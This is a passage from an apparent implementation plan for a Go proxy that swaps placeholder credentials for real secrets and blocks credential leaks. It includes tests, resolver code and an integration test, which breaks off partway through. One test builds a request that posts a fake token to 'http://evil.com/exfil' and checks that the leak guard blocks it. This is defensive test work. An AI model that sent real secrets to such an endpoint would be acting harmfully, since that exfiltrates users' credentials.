+func TestCredsSubHook_PreHook_ReplacesInHeaders(t *testing.T) {
+	tbl := newTestTable(t)
+	h := NewCredsSubHook(tbl)
+
+	req := httptest.NewRequest(http.MethodPost, "http://api.example.com/v1/test", nil)
+	req.Header.Set("Authorization", "Bearer ghp_FAKE1234567890abcdef")
+
+	err := h.PreHook(req, &RequestContext{})
+	if err != nil {
+		t.Fatalf("PreHook error: %v", err)
+	}
+
+	got := req.Header.Get("Authorization")
+	want := "Bearer ghp_REAL1234567890abcdef"
+	if got != want {
+		t.Errorf("Authorization = %q, want %q", got, want)
+	}
+}
+
+func TestCredsSubHook_PreHook_ReplacesInQuery(t *testing.T) {
+	tbl := newTestTable(t)
+	h := NewCredsSubHook(tbl)
+
+	req := httptest.NewRequest(http.MethodGet,
+		"http://api.example.com/v1/test?key=ghp_FAKE1234567890abcdef", nil)
+
+	err := h.PreHook(req, &RequestContext{})
+	if err != nil {
+		t.Fatalf("PreHook error: %v", err)
+	}
+
+	got := req.URL.RawQuery
+	want := "key=ghp_REAL1234567890abcdef"
+	if got != want {
+		t.Errorf("RawQuery = %q, want %q", got, want)
+	}
+}
+
+func TestCredsSubHook_PreHook_ReplacesInPath(t *testing.T) {
+	tbl := newTestTable(t)
+	h := NewCredsSubHook(tbl)
+
+	req := httptest.NewRequest(http.MethodGet,
+		"http://api.example.com/v1/ghp_FAKE1234567890abcdef/info", nil)
+
+	err := h.PreHook(req, &RequestContext{})
+	if err != nil {
+		t.Fatalf("PreHook error: %v", err)
+	}
+
+	got := req.URL.Path
+	want := "/v1/ghp_REAL1234567890abcdef/info"
+	if got != want {
+		t.Errorf("Path = %q, want %q", got, want)
+	}
+}
+```
+
+- [ ] **Step 2: Run tests to verify they fail**
+
+Run: `go test ./internal/proxy/ -v -run "TestCredsSubHook_PreHook_ReplacesIn(Headers|Query|Path)"`
+Expected: FAIL — headers/query/path not substituted
+
+- [ ] **Step 3: Extend CredsSubHook.PreHook**
+
+Replace the existing `PreHook` method on `CredsSubHook` in `internal/proxy/credshook.go`:
+
+```go
+// PreHook replaces fake credentials with real ones in the request
+// body, header values, URL query string, and URL path.
+func (h *CredsSubHook) PreHook(r *http.Request, _ *RequestContext) error {
+	// Body substitution.
+	if r.Body != nil {
+		body, err := io.ReadAll(r.Body)
+		if err != nil {
+			return nil // best-effort
+		}
+		replaced := h.table.ReplaceFakeToReal(body)
+		r.Body = io.NopCloser(bytes.NewReader(replaced))
+		r.ContentLength = int64(len(replaced))
+	}
+
+	// Header value substitution.
+	for key, vals := range r.Header {
+		for i, v := range vals {
+			replaced := h.table.ReplaceFakeToReal([]byte(v))
+			r.Header[key][i] = string(replaced)
+		}
+	}
+
+	// URL query substitution.
+	if rq := r.URL.RawQuery; rq != "" {
+		replaced := string(h.table.ReplaceFakeToReal([]byte(rq)))
+		r.URL.RawQuery = replaced
+	}
+
+	// URL path substitution.
+	if p := r.URL.Path; p != "" {
+		replaced := string(h.table.ReplaceFakeToReal([]byte(p)))
+		r.URL.Path = replaced
+	}
+	if rp := r.URL.RawPath; rp != "" {
+		replaced := string(h.table.ReplaceFakeToReal([]byte(rp)))
+		r.URL.RawPath = replaced
+	}
+
+	return nil
+}
+```
+
+- [ ] **Step 4: Run tests to verify they pass**
+
+Run: `go test ./internal/proxy/ -v -run TestCredsSubHook`
+Expected: PASS (all CredsSubHook tests — existing + 3 new)
+
+- [ ] **Step 5: Commit**
+
+```bash
+git add internal/proxy/credshook.go internal/proxy/credshook_test.go
+git commit -m "feat(proxy): extend CredsSubHook to substitute in headers, query, path"
+```
+
+---
+
+### Task 6: LeakGuardHook service-awareness
+
+**Files:**
+- Modify: `internal/proxy/credshook.go`
+- Modify: `internal/proxy/credshook_test.go`
+
+- [ ] **Step 1: Write failing test for service-aware skip**
+
+Append to `internal/proxy/credshook_test.go`:
+
+```go
+func TestLeakGuardHook_SkipsMatchedService(t *testing.T) {
+	tbl := newTestTable(t) // has "github" fake
+	h := NewLeakGuardHook(tbl, slog.Default())
+
+	body := []byte(`{"token":"ghp_FAKE1234567890abcdef"}`)
+	req := httptest.NewRequest(http.MethodPost, "http://api.github.com/repos", bytes.NewReader(body))
+
+	// ServiceName is set — this is a matched service, should NOT block.
+	err := h.PreHook(req, &RequestContext{
+		RequestID:   "r1",
+		SessionID:   "s1",
+		ServiceName: "github",
+	})
+	if err != nil {
+		t.Fatalf("LeakGuardHook should skip matched services, got: %v", err)
+	}
+}
+
+func TestLeakGuardHook_BlocksUnmatchedWithFake(t *testing.T) {
+	tbl := newTestTable(t)
+	h := NewLeakGuardHook(tbl, slog.Default())
+
+	body := []byte(`{"token":"ghp_FAKE1234567890abcdef"}`)
+	req := httptest.NewRequest(http.MethodPost, "http://evil.com/exfil", bytes.NewReader(body))
+
+	// ServiceName is empty — unmatched host, should block.
+	err := h.PreHook(req, &RequestContext{
+		RequestID:   "r1",
+		SessionID:   "s1",
+		ServiceName: "",
+	})
+	if err == nil {
+		t.Fatal("LeakGuardHook should block fakes to unmatched hosts")
+	}
+
+	var abortErr *HookAbortError
+	if !errors.As(err, &abortErr) || abortErr.StatusCode != 403 {
+		t.Errorf("expected HookAbortError 403, got: %v", err)
+	}
+}
+```
+
+- [ ] **Step 2: Run the service-aware skip test to verify it fails**
+
+Run: `go test ./internal/proxy/ -v -run TestLeakGuardHook_SkipsMatchedService`
+Expected: FAIL — LeakGuardHook currently blocks ALL requests containing fakes
+
+- [ ] **Step 3: Make LeakGuardHook service-aware**
+
+Replace the `PreHook` method on `LeakGuardHook` in `internal/proxy/credshook.go`:
+
+```go
+func (h *LeakGuardHook) PreHook(r *http.Request, ctx *RequestContext) error {
+	// Skip for matched services — fakes are expected there and will be
+	// substituted by CredsSubHook. Only scan unmatched hosts.
+	if ctx.ServiceName != "" {
+		return nil
+	}
+
+	// Scan request body.
+	if r.Body != nil {
+		body, err := io.ReadAll(r.Body)
+		if err == nil {
+			r.Body = io.NopCloser(bytes.NewReader(body))
+			if serviceName, found := h.table.ContainsFake(body); found {
+				h.logLeak(ctx, serviceName, r.Host)
+				return &HookAbortError{StatusCode: 403, Message: "credential leak blocked"}
+			}
+		}
+	}
+
+	// Scan URL query string.
+	if rawQuery := r.URL.RawQuery; rawQuery != "" {
+		if serviceName, found := h.table.ContainsFake([]byte(rawQuery)); found {
+			h.logLeak(ctx, serviceName, r.Host)
+			return &HookAbortError{StatusCode: 403, Message: "credential leak blocked"}
+		}
+	}
+
+	// Scan select headers (all values, not just the first).
+	for _, hdr := range scanHeaders {
+		for _, val := range r.Header.Values(hdr) {
+			if serviceName, found := h.table.ContainsFake([]byte(val)); found {
+				h.logLeak(ctx, serviceName, r.Host)
+				return &HookAbortError{StatusCode: 403, Message: "credential leak blocked"}
+			}
+		}
+	}
+
+	return nil
+}
+```
+
+- [ ] **Step 4: Run all LeakGuardHook tests to verify they pass**
+
+Run: `go test ./internal/proxy/ -v -run TestLeakGuardHook`
+Expected: PASS. Note: existing tests pass `&RequestContext{}` (empty ServiceName), so they still exercise the blocking path.
+
+- [ ] **Step 5: Commit**
+
+```bash
+git add internal/proxy/credshook.go internal/proxy/credshook_test.go
+git commit -m "fix(proxy): LeakGuardHook skips matched services, blocks unmatched only"
+```
+
+---
+
+### Task 7: Proxy integration (matcher + ServiceName)
+
+**Files:**
+- Modify: `internal/proxy/proxy.go`
+- Modify: `internal/proxy/proxy_hooks_test.go`
+
+- [ ] **Step 1: Add matcher field and SetMatcher to Proxy**
+
+In `internal/proxy/proxy.go`, add the import for the services package:
+
+```go
+"github.com/agentsh/agentsh/internal/proxy/services"
+```
+
+Add a `matcher` field to the `Proxy` struct after the `hookRegistry` field:
+
+```go
+	// matcher resolves Host headers to service names.
+	matcher *services.Matcher
+```
+
+Add a `SetMatcher` method after the `HookRegistry` method:
+
+```go
+// SetMatcher sets the service matcher on the proxy. It is safe for
+// concurrent use and is called after credential bootstrap completes.
+func (p *Proxy) SetMatcher(m *services.Matcher) {
+	p.mu.Lock()
+	defer p.mu.Unlock()
+	p.matcher = m
+}
+
+func (p *Proxy) getMatcher() *services.Matcher {
+	p.mu.Lock()
+	defer p.mu.Unlock()
+	return p.matcher
+}
+```
+
+- [ ] **Step 2: Wire ServiceName into ServeHTTP**
+
+In `ServeHTTP`, find the block that creates `reqCtx` (around line 364-371). Replace it with a version that resolves the service name:
+
+Replace:
+```go
+	// reqCtx is declared here so the ModifyResponse closure captures it.
+	var reqCtx *RequestContext
+
+	// Apply pre-hooks (leak guard, credential substitution).
+	if p.hookRegistry != nil {
+		reqCtx = &RequestContext{
+			RequestID: requestID,
+			SessionID: sessionID,
+			StartTime: startTime,
+			Attrs:     make(map[string]any),
+		}
+		if err := p.hookRegistry.ApplyPreHooks("", r, reqCtx); err != nil {
+```
+
+With:
+```go
+	// reqCtx is declared here so the ModifyResponse closure captures it.
+	var reqCtx *RequestContext
+
+	// Apply pre-hooks (leak guard, credential substitution).
+	if p.hookRegistry != nil {
+		// Resolve service name from host.
+		serviceName := ""
+		if m := p.getMatcher(); m != nil {
+			if name, ok := m.Match(r.Host); ok {
+				serviceName = name
+			}
+		}
+		reqCtx = &RequestContext{
+			RequestID:   requestID,
+			SessionID:   sessionID,
+			ServiceName: serviceName,
+			StartTime:   startTime,
+			Attrs:       make(map[string]any),
+		}
+		if err := p.hookRegistry.ApplyPreHooks(serviceName, r, reqCtx); err != nil {
+```
+
+Also update the `ApplyPostHooks` call in the `ModifyResponse` closure. Find:
+
+```go
+		if hookErr := p.hookRegistry.ApplyPostHooks("", resp, reqCtx); hookErr != nil {
+```
+
+Replace with:
+
+```go
+		if hookErr := p.hookRegistry.ApplyPostHooks(reqCtx.ServiceName, resp, reqCtx); hookErr != nil {
+```
+
+- [ ] **Step 3: Write test for service-name dispatch through proxy**
+
+Append to `internal/proxy/proxy_hooks_test.go`:
+
+```go
+func TestProxy_MatcherDispatchesServiceHooks(t *testing.T) {
+	cfg := Config{SessionID: "test-session"}
+	p, err := New(cfg, "", nil)
+	if err != nil {
+		t.Fatalf("New() error: %v", err)
+	}
+
+	p.SetMatcher(services.NewMatcher([]services.ServicePattern{
+		{Name: "github", Hosts: []string{"api.github.com"}},
+	}))
+
+	// Register a hook under "github" that records it was called.
+	called := false
+	p.HookRegistry().Register("github", &fakeHook{
+		name: "recorder",
+		preFn: func(r *http.Request, ctx *RequestContext) error {
+			called = true
+			if ctx.ServiceName != "github" {
+				t.Errorf("ServiceName = %q, want github", ctx.ServiceName)
+			}
+			return nil
+		},
+	})
+
+	req := httptest.NewRequest(http.MethodPost, "http://api.github.com/v1/messages",
+		bytes.NewReader([]byte(`{}`)))
+	req.Header.Set("x-api-key", "sk-ant-test")
+	req.Header.Set("anthropic-version", "2023-06-01")
+	w := httptest.NewRecorder()
+
+	p.ServeHTTP(w, req)
+
+	if !called {
+		t.Error("service-scoped hook was not called for matched host")
+	}
+}
+```
+
+Also add the import for `services` at the top of `proxy_hooks_test.go`:
+
+```go
+"github.com/agentsh/agentsh/internal/proxy/services"
+```
+
+And extend the `fakeHook` struct to support a custom `preFn` callback. Find the existing `fakeHook` in the test file. If it doesn't have a `preFn` field, we need to check what it looks like.
+
+- [ ] **Step 4: Check existing fakeHook definition and extend if needed**
+
+Read `internal/proxy/proxy_hooks_test.go` to see the existing `fakeHook` type. If it doesn't have a `preFn` callback, find where it's defined (could be in `hooks_test.go`) and add the field.
+
+The fakeHook likely lives in `internal/proxy/hooks_test.go`. It needs a `preFn` callback field:
+
+```go
+type fakeHook struct {
+	name   string
+	preErr error
+	preFn  func(*http.Request, *RequestContext) error
+}
+
+func (h *fakeHook) Name() string { return h.name }
+func (h *fakeHook) PreHook(r *http.Request, ctx *RequestContext) error {
+	if h.preFn != nil {
+		return h.preFn(r, ctx)
+	}
+	return h.preErr
+}
+func (h *fakeHook) PostHook(_ *http.Response, _ *RequestContext) error { return nil }
+```
+
+If the existing `fakeHook` doesn't have `preFn`, add the field and update `PreHook` to call it.
+
+- [ ] **Step 5: Run tests to verify they pass**
+
+Run: `go test ./internal/proxy/ -v -run TestProxy_MatcherDispatchesServiceHooks`
+Expected: PASS
+
+Run: `go test ./internal/proxy/ -v -count=1`
+Expected: PASS (all existing + new tests)
+
+- [ ] **Step 6: Commit**
+
+```bash
+git add internal/proxy/proxy.go internal/proxy/proxy_hooks_test.go internal/proxy/hooks_test.go
+git commit -m "feat(proxy): wire ServiceMatcher into ServeHTTP for per-service hook dispatch"
+```
+
+---
+
+### Task 8: Resolver + bootstrap wiring
+
+**Files:**
+- Create: `internal/session/secretsconfig.go`
+- Create: `internal/session/secretsconfig_test.go`
+- Modify: `internal/session/llmproxy.go`
+- Modify: `internal/session/llmproxy_test.go`
+- Modify: `internal/api/app.go`
+
+- [ ] **Step 1: Write the resolver**
+
+```go
+// internal/session/secretsconfig.go
+package session
+
+import (
+	"context"
+	"fmt"
+
+	"github.com/agentsh/agentsh/internal/policy"
+	"github.com/agentsh/agentsh/internal/proxy/secrets"
+	"github.com/agentsh/agentsh/internal/proxy/secrets/keyring"
+	"github.com/agentsh/agentsh/internal/proxy/secrets/vault"
+	"github.com/agentsh/agentsh/internal/proxy/services"
+	"gopkg.in/yaml.v3"
+)
+
+// InjectHeaderConfig holds header injection config for one service.
+type InjectHeaderConfig struct {
+	ServiceName string
+	HeaderName  string
+	Template    string
+}
+
+// ResolvedServices holds the parsed outputs needed by the bootstrap flow.
+type ResolvedServices struct {
+	ServiceConfigs []ServiceConfig
+	Patterns       []services.ServicePattern
+	InjectHeaders  []InjectHeaderConfig
+}
+
+// ResolveProviderConfigs decodes policy YAML provider nodes into
+// typed ProviderConfig values suitable for secrets.NewRegistry.
+func ResolveProviderConfigs(providers map[string]yaml.Node) (map[string]secrets.ProviderConfig, error) {
+	if len(providers) == 0 {
+		return nil, nil
+	}
+	configs := make(map[string]secrets.ProviderConfig, len(providers))
+	for name, node := range providers {
+		cfg, err := decodeProviderConfig(name, node)
+		if err != nil {
+			return nil, fmt.Errorf("provider %q: %w", name, err)
+		}
+		configs[name] = cfg
+	}
+	return configs, nil
+}
+
+// ResolveServiceConfigs converts policy YAML service declarations into
+// ServiceConfigs for BootstrapCredentials plus ServicePatterns for the
+// matcher and InjectHeaderConfigs for hook registration.
+func ResolveServiceConfigs(svcs []policy.ServiceYAML) (*ResolvedServices, error) {
+	if len(svcs) == 0 {
+		return nil, nil
+	}
+	result := &ResolvedServices{
+		ServiceConfigs: make([]ServiceConfig, 0, len(svcs)),
+		Patterns:       make([]services.ServicePattern, 0, len(svcs)),
+	}
+	for _, svc := range svcs {
+		ref, err := secrets.ParseRef(svc.Secret.Ref)
+		if err != nil {
+			return nil, fmt.Errorf("service %q: %w", svc.Name, err)
+		}
+		result.ServiceConfigs = append(result.ServiceConfigs, ServiceConfig{
+			Name:       svc.Name,
+			SecretRef:  ref,
+			FakeFormat: svc.Fake.Format,
+		})
+		result.Patterns = append(result.Patterns, services.ServicePattern{
+			Name:  svc.Name,
+			Hosts: svc.Match.Hosts,
+		})
+		if svc.Inject.Header != nil {
+			result.InjectHeaders = append(result.InjectHeaders, InjectHeaderConfig{
+				ServiceName: svc.Name,
+				HeaderName:  svc.Inject.Header.Name,
+				Template:    svc.Inject.Header.Template,
+			})
+		}
+	}
+	return result, nil
+}
+
+// DefaultConstructors returns the constructor map for all known
+// provider types. Used by secrets.NewRegistry.
+func DefaultConstructors() map[string]secrets.ConstructorFunc {
+	return map[string]secrets.ConstructorFunc{
+		"keyring": keyring.NewProvider,
+		"vault":   vault.NewProvider,
+	}
+}
+
+// decodeProviderConfig decodes a yaml.Node into the appropriate
+// typed ProviderConfig based on the "type" field.
+func decodeProviderConfig(name string, node yaml.Node) (secrets.ProviderConfig, error) {
+	var base struct {
+		Type string `yaml:"type"`
+	}
+	if err := node.Decode(&base); err != nil {
+		return nil, fmt.Errorf("decode type: %w", err)
+	}
+	switch base.Type {
+	case "keyring":
+		return keyring.Config{}, nil
+	case "vault":
+		return decodeVaultConfig(node)
+	default:
+		return nil, fmt.Errorf("unknown provider type %q", base.Type)
+	}
+}
+
+// vaultYAML is the YAML representation of a vault provider config.
+type vaultYAML struct {
+	Type      string        `yaml:"type"`
+	Address   string        `yaml:"address"`
+	Namespace string        `yaml:"namespace,omitempty"`
+	Auth      vaultAuthYAML `yaml:"auth"`
+}
+
+type vaultAuthYAML struct {
+	Method        string `yaml:"method"`
+	Token         string `yaml:"token,omitempty"`
+	TokenRef      string `yaml:"token_ref,omitempty"`
+	RoleID        string `yaml:"role_id,omitempty"`
+	RoleIDRef     string `yaml:"role_id_ref,omitempty"`
+	SecretID      string `yaml:"secret_id,omitempty"`
+	SecretIDRef   string `yaml:"secret_id_ref,omitempty"`
+	KubeRole      string `yaml:"kube_role,omitempty"`
+	KubeMountPath string `yaml:"kube_mount_path,omitempty"`
+	KubeTokenPath string `yaml:"kube_token_path,omitempty"`
+}
+
+func decodeVaultConfig(node yaml.Node) (secrets.ProviderConfig, error) {
+	var raw vaultYAML
+	if err := node.Decode(&raw); err != nil {
+		return nil, fmt.Errorf("decode vault config: %w", err)
+	}
+	cfg := vault.Config{
+		Address:   raw.Address,
+		Namespace: raw.Namespace,
+		Auth: vault.AuthConfig{
+			Method:        raw.Auth.Method,
+			Token:         raw.Auth.Token,
+			RoleID:        raw.Auth.RoleID,
+			SecretID:      raw.Auth.SecretID,
+			KubeRole:      raw.Auth.KubeRole,
+			KubeMountPath: raw.Auth.KubeMountPath,
+			KubeTokenPath: raw.Auth.KubeTokenPath,
+		},
+	}
+	// Parse chained refs.
+	if raw.Auth.TokenRef != "" {
+		ref, err := secrets.ParseRef(raw.Auth.TokenRef)
+		if err != nil {
+			return nil, fmt.Errorf("auth.token_ref: %w", err)
+		}
+		cfg.Auth.TokenRef = &ref
+	}
+	if raw.Auth.RoleIDRef != "" {
+		ref, err := secrets.ParseRef(raw.Auth.RoleIDRef)
+		if err != nil {
+			return nil, fmt.Errorf("auth.role_id_ref: %w", err)
+		}
+		cfg.Auth.RoleIDRef = &ref
+	}
+	if raw.Auth.SecretIDRef != "" {
+		ref, err := secrets.ParseRef(raw.Auth.SecretIDRef)
+		if err != nil {
+			return nil, fmt.Errorf("auth.secret_id_ref: %w", err)
+		}
+		cfg.Auth.SecretIDRef = &ref
+	}
+	return cfg, nil
+}
+
+// BuildSecretsRegistry creates a provider registry from the resolved
+// config and returns a SecretFetcher. Convenience wrapper around
+// secrets.NewRegistry.
+func BuildSecretsRegistry(ctx context.Context, configs map[string]secrets.ProviderConfig) (*secrets.Registry, error) {
+	return secrets.NewRegistry(ctx, configs, DefaultConstructors())
+}
+```
+
+- [ ] **Step 2: Write resolver tests**
+
+```go
+// internal/session/secretsconfig_test.go
+package session
+
+import (
+	"testing"
+
+	"github.com/agentsh/agentsh/internal/policy"
+	"github.com/agentsh/agentsh/internal/proxy/secrets/vault"
+	"gopkg.in/yaml.v3"
+)
+
+func mustYAMLNode(t *testing.T, s string) yaml.Node {
+	t.Helper()
+	var node yaml.Node
+	if err := yaml.Unmarshal([]byte(s), &node); err != nil {
+		t.Fatal(err)
+	}
+	if node.Kind == yaml.DocumentNode && len(node.Content) > 0 {
+		return *node.Content[0]
+	}
+	return node
+}
+
+func TestResolveProviderConfigs_Keyring(t *testing.T) {
+	providers := map[string]yaml.Node{
+		"kr": mustYAMLNode(t, "type: keyring"),
+	}
+	configs, err := ResolveProviderConfigs(providers)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if len(configs) != 1 {
+		t.Fatalf("expected 1 config, got %d", len(configs))
+	}
+	if configs["kr"].TypeName() != "keyring" {
+		t.Errorf("TypeName = %q, want keyring", configs["kr"].TypeName())
+	}
+}
+
+func TestResolveProviderConfigs_Vault(t *testing.T) {
+	providers := map[string]yaml.Node{
+		"v": mustYAMLNode(t, "type: vault\naddress: https://vault.example.com\nauth:\n  method: token\n  token_ref: keyring://agentsh/vt"),
+	}
+	configs, err := ResolveProviderConfigs(providers)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	vc, ok := configs["v"].(vault.Config)
+	if !ok {
+		t.Fatalf("expected vault.Config, got %T", configs["v"])
+	}
+	if vc.Address != "https://vault.example.com" {
+		t.Errorf("Address = %q", vc.Address)
+	}
+	if vc.Auth.TokenRef == nil {
+		t.Fatal("TokenRef should be set")
+	}
+	if vc.Auth.TokenRef.Scheme != "keyring" {
+		t.Errorf("TokenRef.Scheme = %q, want keyring", vc.Auth.TokenRef.Scheme)
+	}
+}
+
+func TestResolveProviderConfigs_Empty(t *testing.T) {
+	configs, err := ResolveProviderConfigs(nil)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if configs != nil {
+		t.Errorf("expected nil, got %v", configs)
+	}
+}
+
+func TestResolveServiceConfigs(t *testing.T) {
+	svcs := []policy.ServiceYAML{
+		{
+			Name:   "github",
+			Match:  policy.ServiceMatchYAML{Hosts: []string{"api.github.com"}},
+			Secret: policy.ServiceSecretYAML{Ref: "keyring://agentsh/gh"},
+			Fake:   policy.ServiceFakeYAML{Format: "ghp_{rand:36}"},
+			Inject: policy.ServiceInjectYAML{Header: &policy.ServiceInjectHeaderYAML{
+				Name: "Authorization", Template: "Bearer {{secret}}",
+			}},
+		},
+	}
+	result, err := ResolveServiceConfigs(svcs)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if len(result.ServiceConfigs) != 1 {
+		t.Fatalf("expected 1 config, got %d", len(result.ServiceConfigs))
+	}
+	if result.ServiceConfigs[0].Name != "github" {
+		t.Errorf("Name = %q", result.ServiceConfigs[0].Name)
+	}
+	if len(result.Patterns) != 1 || result.Patterns[0].Name != "github" {
+		t.Error("patterns not populated")
+	}
+	if len(result.InjectHeaders) != 1 || result.InjectHeaders[0].HeaderName != "Authorization" {
+		t.Error("inject headers not populated")
+	}
+}
+
+func TestResolveServiceConfigs_Empty(t *testing.T) {
+	result, err := ResolveServiceConfigs(nil)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if result != nil {
+		t.Error("expected nil")
+	}
+}
+```
+
+- [ ] **Step 3: Run resolver tests**
+
+Run: `go test ./internal/session/ -v -run "TestResolve(Provider|Service)Configs"`
+Expected: PASS
+
+- [ ] **Step 4: Update StartLLMProxy signature**
+
+Replace the `StartLLMProxy` function signature and body in `internal/session/llmproxy.go`. Change the parameters from `secretsFetcher SecretFetcher, services []ServiceConfig` to accept YAML types:
+
+```go
+func StartLLMProxy(
+	sess *Session,
+	proxyCfg config.ProxyConfig,
+	dlpCfg config.DLPConfig,
+	storageCfg config.LLMStorageConfig,
+	mcpCfg config.SandboxMCPConfig,
+	storagePath string,
+	logger *slog.Logger,
+	providers map[string]yaml.Node,
+	policyServices []policy.ServiceYAML,
+) (string, func() error, error) {
+```
+
+Add the necessary imports:
+
+```go
+	"github.com/agentsh/agentsh/internal/policy"
+	"github.com/agentsh/agentsh/internal/proxy/services"
+	"gopkg.in/yaml.v3"
+```
+
+Replace the bootstrap block (the `if len(services) > 0 && secretsFetcher != nil` section) with:
+
+```go
+	// Bootstrap credentials and register hooks if services are configured.
+	// Done BEFORE storing on session so a failure leaves no stale state.
+	if len(policyServices) > 0 {
+		resolved, resolveErr := ResolveServiceConfigs(policyServices)
+		if resolveErr != nil {
+			_ = p.Stop(ctx)
+			return "", nil, fmt.Errorf("resolve services: %w", resolveErr)
+		}
+
+		providerConfigs, provErr := ResolveProviderConfigs(providers)
+		if provErr != nil {
+			_ = p.Stop(ctx)
+			return "", nil, fmt.Errorf("resolve providers: %w", provErr)
+		}
+
+		registry, regErr := BuildSecretsRegistry(ctx, providerConfigs)
+		if regErr != nil {
+			_ = p.Stop(ctx)
+			return "", nil, fmt.Errorf("build secrets registry: %w", regErr)
+		}
+
+		table, secretsCleanup, bsErr := BootstrapCredentials(ctx, registry, resolved.ServiceConfigs)
+		if bsErr != nil {
+			_ = registry.Close()
+			_ = p.Stop(ctx)
+			return "", nil, fmt.Errorf("bootstrap credentials: %w", bsErr)
+		}
+
+		// Register hooks: leak guard first, then creds substitution (both global).
+		leakGuard := proxy.NewLeakGuardHook(table, logger)
+		credsSub := proxy.NewCredsSubHook(table)
+		p.HookRegistry().Register("", leakGuard)
+		p.HookRegistry().Register("", credsSub)
+
+		// Register per-service header injection hooks.
+		for _, ih := range resolved.InjectHeaders {
+			hook := proxy.NewHeaderInjectionHook(ih.ServiceName, ih.HeaderName, ih.Template, table)
+			p.HookRegistry().Register(ih.ServiceName, hook)
+		}
+
+		// Build and set matcher.
+		matcher := services.NewMatcher(resolved.Patterns)
+		p.SetMatcher(matcher)
+
+		// Wrap registry close into the secrets cleanup.
+		origCleanup := secretsCleanup
+		combinedCleanup := func() {
+			origCleanup()
+			_ = registry.Close()
+		}
+		sess.SetCredsTable(table, combinedCleanup)
+		LogSecretsInitialized(logger, sess.ID, len(resolved.ServiceConfigs))
+	}
+```
+
+Remove the old `SecretFetcher` import if it was only used by the old code path. The `SecretFetcher` type and `BootstrapCredentials` still exist in `secrets.go` — they're still used internally.
+
+- [ ] **Step 5: Update test call sites**
+
+In `internal/session/llmproxy_test.go`, find all calls to `StartLLMProxy` that pass `nil, nil` and update them to match the new signature:
+
+Change `nil, nil` → `nil, nil` (same args, but now typed as `map[string]yaml.Node` and `[]policy.ServiceYAML`). Since Go allows passing `nil` for map and slice types, the existing `nil, nil` calls should still compile. Verify by building.
+
+Add the import for `policy` and `yaml.v3` if needed by any test.
+
+- [ ] **Step 6: Update production caller**
+
+In `internal/api/app.go`, change the `StartLLMProxy` call to pass the policy's providers and services. Find the call around line 466:
+
+```go
+	proxyURL, closeFn, err := session.StartLLMProxy(
+		s,
+		a.cfg.Proxy,
+		a.cfg.DLP,
+		a.cfg.LLMStorage,
+		a.cfg.Sandbox.MCP,
+		storagePath,
+		slog.Default(),
+		nil, nil,
+	)
+```
+
+The policy is available via `s.Policy` (which is the raw YAML string). We need to parse it to get providers and services. However, the Policy field on Session is a string, not a parsed struct. The parsed policy is used during session creation.
+
+Look at how the session's policy is loaded. If it's already parsed and available at the call site, use it. If not, we pass `nil, nil` for now (no providers/services in the session's policy yet) and update the call site when policy configuration is wired in.
+
+For now, keep `nil, nil` at the production call site (backward compatible). The actual wiring of policy providers/services to the production path requires understanding how policies are loaded per session, which is a separate concern. The infrastructure is ready — a future change to the session creation flow will pass the parsed policy's providers/services.
+
+- [ ] **Step 7: Build and test everything**
+
+Run: `go build ./... && GOOS=windows go build ./...`
+Expected: clean build
+
+Run: `go test ./internal/session/ -v -count=1`
+Expected: PASS
+
+Run: `go test ./... -count=1`
+Expected: PASS
+
+- [ ] **Step 8: Commit**
+
+```bash
+git add internal/session/secretsconfig.go internal/session/secretsconfig_test.go \
+       internal/session/llmproxy.go internal/session/llmproxy_test.go \
+       internal/api/app.go
+git commit -m "feat(session): resolver + updated bootstrap for policy-driven secrets config"
+```
+
+---
+
+### Task 9: Integration test
+
+**Files:**
+- Modify: `internal/session/secrets_integration_test.go`
+
+- [ ] **Step 1: Write end-to-end integration test**
+
+Add a new test to `internal/session/secrets_integration_test.go` (or create it if needed — it was created in Plan 5):
+
+```go
+func TestIntegration_PolicyYAML_FullFlow(t *testing.T) {
+	// Setup: create a memory provider with a known secret.
+	memProvider := &memoryProvider{
+		secrets: map[string][]byte{
+			"keyring://agentsh/github_token": []byte("ghp_REAL1234567890abcdef"),
+		},
+	}
+
+	// Build ServiceConfigs as if resolved from YAML.
+	ref, err := secrets.ParseRef("keyring://agentsh/github_token")
+	if err != nil {
+		t.Fatal(err)
+	}
+	serviceConfigs := []ServiceConfig{
+		{Name: "github", SecretRef: ref, FakeFormat: "ghp_{rand:36}"},
+	}
+
+	// Bootstrap credentials.
+	table, cleanup, err := BootstrapCredentials(context.Background(), memProvider, serviceConfigs)
+	if err != nil {
+		t.Fatalf("BootstrapCredentials: %v", err)
+	}
+	defer cleanup()
+
+	// Verify fake was generated and is in the table.
+	fake, ok := table.FakeForService("github")
+	if !ok {
+		t.Fatal("no fake for github")
+	}
+
+	// Build matcher.
+	matcher := services.NewMatcher([]services.ServicePattern{
+		{Name: "github", Hosts: []string{"api.github.com"}},
+	})
+
+	// Verify host matching.
+	name, matched := matcher.Match("api.github.com")
+	if !matched || name != "github" {
+		t.Fatalf("Match(api.github.com) = (%q, %v)", name, matched)
+	}
+
+	// Verify fake→real substitution.
+	body := []byte(fmt.Sprintf(`{"token":"%s"}`, fake))
+	replaced := table.ReplaceFakeToReal(body)
+	if !bytes.Contains(replaced, []byte("ghp_REAL1234567890abcdef")) {
+		t.Errorf("body not substituted: %s", replaced)
+	}
+
+	// Verify header injection.
+	hook := proxy.NewHeaderInjectionHook("github", "Authorization", "Bearer {{secret}}", table)
+	req := httptest.NewRequest(http.MethodPost, "http://api.github.com/repos", nil)
+	if err := hook.PreHook(req, &proxy.RequestContext{ServiceName: "github"}); err != nil {
+		t.Fatal(err)
+	}
+	authHeader := req.Header.Get("Authorization")
+	if authHeader != "Bearer ghp_REAL1234567890abcdef" {
+		t.Errorf("Authorization = %q, want Bearer ghp_REAL...", authHeader)
+	}
+
+	// Verify real→fake scrubbing on response.
+	respBody := []byte(`{"echoed":"ghp_REAL1234567890abcdef"}`)
+	scrubbed := table.ReplaceRealToFake(respBody)
+	if !bytes.Contains(scrubbed, fake) {
+		t.Errorf("response not scrubbed: %s", scrubbed)
+	}
+
+	// Verify leak guard skips matched service.
+	leakGuard := proxy.NewLeakGuardHook(table, slog.Default())
+	leakReq := httptest.NewRequest(http.MethodPost, "http://api.github.com/repos",
+		bytes.NewReader([]byte(fmt.Sprintf(`{"t":"%s"}`, fake))))
